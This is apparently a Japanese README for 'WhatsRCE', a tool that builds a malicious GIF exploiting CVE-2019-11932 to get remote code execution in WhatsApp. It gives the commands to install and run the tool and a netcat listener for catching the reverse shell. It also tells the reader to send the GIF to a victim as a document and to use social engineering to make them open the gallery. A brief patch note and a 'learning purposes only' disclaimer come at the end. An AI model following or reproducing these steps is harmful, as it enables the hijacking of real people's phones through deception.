WhatsRCE
これは CVE-2019-11932(WhatsApp リモートコード実行)用の自動生成ペイロードです。
- GCC を自動インストール(無害なコマンドです。オープンソースであることを確認できます)
- .GIF ファイルに保存
使い方は?
sudo apt install git
git clone https://github.com/KeepWannabe/WhatsRCE
cd WhatsRCE && bash start.sh
シェルを入手するには?
- 被害者ユーザーに .GIF ファイルを 画像としてではなく文書として 送信するだけです。
- そして、WhatsRCE ツールで設定したポートに nc / netcat を設定します {nc -lnvp your_port}。
- ソーシャルエンジニアリング攻撃を利用して、被害者にこのエクスプロイトを実行させることができます。
- 被害者に WhatsApp でギャラリーを開くように指示し、被害者に任意の写真を送信させます(送信不要、ギャラリーに移動するだけで問題ありません)。その後、数秒以内に被害者からのシェル接続を受け取ります。
または、これを視聴してください
デモビデオ
https://drive.google.com/file/d/1T-v5XG8yQuiPojeMpOAG6UGr2TYpocIj/view
上記のリンクにアクセスできない場合
https://drive.google.com/open?id=1X9nBlf5oj5ef2UoYGOfusjxAiow8nKEK
この攻撃を回避するには?
- WhatsApp を最新バージョンに更新します (バージョン 2.19.244 でパッチ適用済み)
- 知らない人から音声、画像、その他を含むあらゆるファイルを受け取る方法
これは学習目的のみです。犯罪に使用した場合の結果などについて、当方は一切責任を負いません!